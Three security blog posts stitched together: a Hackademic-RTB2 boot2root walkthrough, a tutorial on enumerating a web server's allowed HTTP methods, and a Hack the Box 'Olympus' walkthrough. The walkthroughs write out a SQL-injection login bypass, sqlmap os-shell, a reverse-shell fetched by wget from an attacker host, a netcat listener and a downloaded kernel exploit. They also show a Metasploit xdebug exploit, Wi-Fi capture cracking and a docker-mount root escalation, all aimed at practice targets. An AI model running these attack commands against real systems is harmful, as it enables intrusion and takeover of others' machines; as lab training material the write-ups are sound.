Hack the Hackademic-RTB2 (Boot2Root)

Hello friends! Today we are going to solve a very simple and easy CTF challenge of the vulnhub. This is the second realistic hackademic challenge (root this box) by mr.pr0n. Download the target it from here.

Penetrating Methodologies

§  Network Scanning (Nmap, netdiscover)

§  SQL-Injection on Login Form

§  Decrypting Hint to Get ports for port knocking

§  Port Knocking using NMAP

§  SQL-Injection using Sqlmap on url

§  Upload and execute a Reverse shell

§  Reverse connection (netcat)

§  Exploiting target (exploit 15285)

§  Get Root access and capture the flag.

Let’s Start!!!

Start off with finding the target using:

netdiscover

Our target is 192.168.1.102. Now scan the target with nmap aggressive:

nmap -A 192.168.1.102

With the nmap scan, you can perceive the port 80 is open and port 666 is filtered.

Further when you will navigate to port 80 by exploring its IP in the browser, you will be welcomed by a login page as shown below.

Look at this login form; we can try for sql injection to bypass this page. So, we had tried the following malicious character inside the text field as shown in the below image.

Username: ‘or1=1—‘

Password: ‘or1=1—‘

Superb!! We have bypassed the login form. But here, the author has left a message for which indicates that, this is not the correct place to hunt the clue for any loophole.

So we looked into its source code and notice some encoded text here.

Since the above text was URL encoded string and we have used burp suite to decode it. So now decode it into HEX and then then HEX to Text.

“Knock Knock Knocking on heaven’s door”

Feels like it is some kind of port knocking and the 8-bit binary words could be possible some ports.

Further, we copied the binary string so that we can decode it, to obtain readable text.  As you can see it, here we have obtained a series of port number 1001:1101:1011:1001.

We have used nmap to recursively hit the ports using the -r parameter.

nmap -r -p 1001,1101,1011,1001 192.168.1.102

After this when we scanned the the target IP once again using nmap and found that the port 666 is open and also running Apache server.

nmap -sV 192.168.1.102

At this moment, we navigate to the newly opened port on the browser by exploring to following url

http://192.168.1.102:666

While browsing the website, we came across the “List of content items…” this url was holding multiple parameter. I found this URL little bit suspicious against SQL injection, let’s ensure this through sqlmap.

To test the url for SQL-Injection we will use sqlmap to enumerate the database name with help of following command.

sqlmap -u "http://192.168.1.102:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" --dbs ---batch

Yupppieee!!! This VM is vulnerable to SQLi and we have successfully enumerated the possible database name “joomla” through sqlmap, now let’s try to inject our payload with help of –os-shell option.

sqlmap -u "http://192.168.1.102:666/index.php?option=com_abc&view=abc&letter=List+of+content+items...&Itemid=3" -D joomla --os-shell --batch

Superb!! We have spawned the os-shell of the target machine.

Now we will use this os- shell to upload a php backdoor, here we used pentestmonkey’s php-reverse-shell.php which is saved inside /usr/share/webshells/php directory, change the listening IP address as your device and the port number as your choice and start a python server using following command for transferring this file.

python -m SimpleHTTPServer 80

And in the os-shell we will use the wget to download the reverse shell.

wget http://192.168.1.109/revshell.php

Since we have uploaded the malicious php inside the /var/www, therefore let’s navigate to web browser and try to execute the revshell.php file but do not forget to start netcat listener.

nc -lvp 1234

Boooom!!  We have compromise the target shell successfully, Here we have discover the Linux kernel version being 2.6.32, after searching not for long on the internet we found the “RDS kernel exploit for privilege escalation from user to root”.

So we downloaded the 15285.c from https://www.exploit-db.com/exploits/15285/ and move it to Desktop where our python server was already running.

On the taget machine we first use the python one-liner to spawn proper tty shell

python –c ‘import pty;pty.spawn(“/bin/bash”)’

Now we move to tmp folder cd /tmp to download the exploit on the target machine using wget command and compile the C file using gcc.

wget http://192.168.1.109/15285.c

gcc 15285.c –o kernel

Then give the file executable permissions and now run the compiled exploit

chmod 777 kernel

./kernel

and BOOM you got the root. Now go to root directory only to discover that there is a key.txt file

When we tried to read the file then it was found to be encoded into base 64.

With the help of following command we will try to decrypt the content of this file.

base64 –d Key.txt > key

Now when we tried to open the file using file command it gave us the description of PNG image

file key

To view it we copied it to /var/www only to download it and view the image.

cp key /var/www

Now download the file from the url http://192.168.1.102:666/key and open in your system to discover that it’s the root flag and you have successfully solved the CTF.

Multiple Ways to Identify HTTP Header Options

Hi Friends, today we will walkthrough various HTTP Protocol methods and the tools used to extract those available HTTP methods in a web server. As we are already aware that the HTTP protocol comprises of number of methods that can be utilized to not only gather the information from the web server, but can also perform specific actions on the web server. These techniques and methods are helpful for the web application developers in the deployment and testing stage of the web applications.

GET and POST are the most well-known methods that are used to access and submit information provided by a web server, respectively. HTTP Protocol allows various other methods as well, like PUT , CONNECT , TRACE, HEAD, DELETE .These methods can be used for malicious purposes , if the web server is left misconfigured and hence poses a major security risk for the web application, as this could allow an attacker to modify the files stored on the web server.

OPTIONS : The OPTIONS method is used to request the available HTTP methods on a web server.

GET : GET request is the most common and widely used methods for the websites. This method is used to retrieve the data from the web server for a specific resource. As the GET method only requests for the data and doesnot modify the content of any resources, it's considered to be safe.

POST : POST requests are used to send (or submit) the data to the web server so as to create or update a resource. The information sent is stored in the request body of the HTTP request and processed further. An example illustrating the same is “Contact us” form page on a website. When we fill a form and submit it, the input data is then stored in the response body of the request and sent across to the server.

PUT : The PUT method allows the end user (client) to upload new files on the web server. An attacker can exploit it by uploading malicious files or by using the victim’s server as a file repository.

CONNECT : The CONNECT method could allow a client to use the web server as a proxy.

TRACE: This method echoes back to the client, the same string which has been sent across to the server, and is used mainly for debugging purposes.

HEAD: The HEAD method is almost similar to GET, however without the message-body in the response. In other words, if the HTTP request GET /products returns a list of products, then the HEAD /products will trigger a similar HTTP request however, won't retrieve the list of products.

DELETE: This method enables a client to delete a file on the web server. An attacker can exploit it as a very simple and direct way to deface a web site or to perform a DoS attack.

Now let us use some tools to identify the HTTP methods enabled or supported by the web server

1.Metasploit

Metasploit Framework is a well-known platform for developing, testing, and executing exploits. It is an open source tool for performing various exploits against the target machines.

Metasploit has in-built auxiliary modules dedicated to scan HTTP methods. Through the Metasploit framework command line (CLI), we can identify the HTTP Options available on the target URL as follows:

use auxiliary/scanner/http/options

set rhosts 192.168.1.109

set rport 80

exploit

2.cURL

cURL is a command line tool to get or send the data using the URL syntax and is compatible with various well-known protocols (HTTPS, FTP, SCP, LDAP, Telnet etc.) along with command line (CLI) options for performing various tasks (Eg: User authentication , FTP uploading , SSL connections etc). The cURL utility by default comes installed in most of the distributions. However if in case , cURL is not installed, then we can install the same via apt-get install curl command . For more details refer the below URL

http://www.hackingarticles.in/web-application-penetration-testing-curl/

Through the cURL command we can identify the HTTP Options available on the target URL as follows :

curl -v -X OPTIONS http://192.168.1.109

The screenshot displays the various types of allowed HTTP methods (GET, HEAD ,POST,OPTIONS, TRACE), apart from other server specific information (Server response , version details etc)

3.Nikto

Nikto is a Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other issues. It performs generic and server type specific checks.

Through the Nikto command we can identify the HTTP Options available on the target URL as follows :

nikto -h 192.168.1.109

The screenshot displays the various types of allowed HTTP methods (GET, HEAD ,POST,OPTIONS, TRACE), apart from other detailed server specific information (Server response , version details etc)

4.NMAP

Nmap is a free and open-source security scanner, used to discover hosts and services on the network. This is another method of checking which HTTP methods are enabled by using an NMAP script called http-methods.nse, which can be obtained from https://nmap.org/nsedoc/scripts/http-methods.html .

Let us use NMAP command to enumerate all of the HTTP methods supported by a web server on the target URL as follows :

nmap --script http-methods --script-args http-method.test-all ='/192.168.1.109' 192.168.1.109

The screenshot displays the various types of allowed HTTP methods (GET, HEAD, POST,OPTIONS, TRACE) along with highlighting the potentially risk methods (i.e TRACE) out of them .

5.Netcat

Netcat is a utility tool having the capability to write and read data across TCP and UDP network connections, along with features like in-built port scanning , network debugging and file transfer etc.

Through the Netcat command we can identify the HTTP Options available on the target URL as follows :

nc 192.168.1.109 80

Press enter and the following options appear in the command line . Enter the server details as follows (and as highlighted in red )

OPTIONS  http://192.168.1.109  / HTTP/1.0

host : 192.168.1.109

The screenshot displays the various types of allowed HTTP methods (GET, HEAD ,POST,OPTIONS, TRACE), apart from other server specific information (Server response , version details etc)

6.Burpsuite

Burp Suite is a platform for performing various security testing for the web applications , from initial mapping and analysis to identifying and exploiting application vulnerabilities.

As we aware that the HTTP OPTIONS method provides us the most effective way to discover the different methods allowed on a HTTP server. So , let us capture the URL request in Burpsuite GUI and change the HTTP method type in the Request section to OPTIONS , as seen below.

As shown , the RESPONSE from the web server not only displays the list of HTTP methods allowed ,however also highlights the server version details (Eg: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL 1.0.0/k DAV/2 PHP/5.4.3)

Hack the Box: Olympus Walkthrough

Today we are going to solve another CTF challenge “Olympus”. Olympus is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have static IP. The IP of Olympus is 10.10.10.83

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.
nmap –A 10.10.10.83

From nmap scanning result, we found that here port 22 is filtered for SSH but instead of that port 2222 is also open for SSH. Moreover port 53 is open for DNS where it has grabbed banner “Bind” and even it found the port 80 is opened for Apache http server. Therefore firstly, let’s navigate to port 80 in the web browser.

After exploring target IP in the web browser, we was welcomed by zeus picture as shown in the above image. Unfortunately! Here we didn’t find any remarkable clue, therefore further, we decided to run Nikto for scanning vulnerabilities.
Let’s find the list of possible vulnerabilities using Nikto:
nikto –h http://10.10.10.83

Scanning with nikto gave us a clue to move forward which is Uncommon header ‘xdebug’. Searching the keyword ‘xdebug’ on google gave us result about ‘xdebug’ command execution exploit module for metasploit. After that load metasploit on your terminal and use the commands as follows:
msf > use exploit/unix/http/xdebug_unauth_exec
msf (exploit/unix/http/xdebug_unauth_exec) > set rhost 10.10.10.83
msf (exploit/unix/http/xdebug_unauth_exec) > set lhost 10.10.14.13
msf (exploit/unix/http/xdebug_unauth_exec) > exploit
Boom!! We have got the meterpreter of the target machine. Then further exploring directories, we noticed a directory /zeus which got a sub directory /airgeddon. As you can relate it with the image below.

Then inside the /airgeddon directory, we opened its sub directory /captured which shows a file captured.cap. It could be another clue, therefore we downloaded this file on our Kali Desktop as you can see in the image below.

After downloading capture.pcap file, we need to analysis it. So when we open this file, it was a wireshark pcap file and by streaming the 1^st packet we noticed SSID: Too_clOse_to_th3_Sun as shown in the given below image. This can be probably used as a Password.

Now cracking the file captured.cap using aircrack following command:
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt
After few minutes we have found the key: flightoficarus as shown in the image below.

We thought icarus could be a username too. Because earlier when we search “Too close to the Sun” in the Google, it shows the wiki page of icarus. Therefore the following combination of credentials probably acquired for SSH login via port 2222.
icarus:Too_clOse_to_th3_Sun
ssh icarus@10.10.10.83 -p 2222
After successfully logging into SSH, on navigating further, we acquired a file “help_of_the_gods.txt”. After reading the file it shows us a domain name ctfolympus.htb as shown in the image below.

We thought of trying dns zone transfer, since dig uses the axfr response to retrieve your zone information.

dig axfr @10.10.10.83 ctfolympus.htb

From the result we figured that pormetheus can be another username and St34l_th3_F1re! could be the possible password. Also there is series of some random port numbers 3456 8234 62431  and  this bring us to ponder on port Knocking that can change the state of SSH port 22 from filtered to open.

We knocked these ports by executing following command:

knock -v 10.10.10.83 3456 8234 62431

After knocking these ports, just to confirm the state of SSH port 22 by using nmap scan. And we succeeded in making the SSH port open.

nmap -p22 10.10.1083

Now by logging into SSH port 22 by using the given below credentials:

Prometheus: St34l_th3_F1re!

Here!! We have found and read user.txt.

Yuppiee!! We have completed our first task, let’s Go for second task………….

Then using id command, it came into notice that prometheus is in docker users group. Let’s have a look at docker images and docker ps as shown in the image below.

docker image

docker ps

By executing the above command we notice there is a docker_image “olympia” hence we can create a copy of a bash with the following command to escalated root privileges:

Time to get root.txt!!

After looking for some information on how to exploit this, we find that we can access it as root by using the following command:

docker run -v /:/root -i -t olympia /bin/bash

Booyah!! We have found root.txt and from the image below you can see we have obtained the value of roo.txt.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. See’s things from a different angle and an out of the box thinker. Contact Here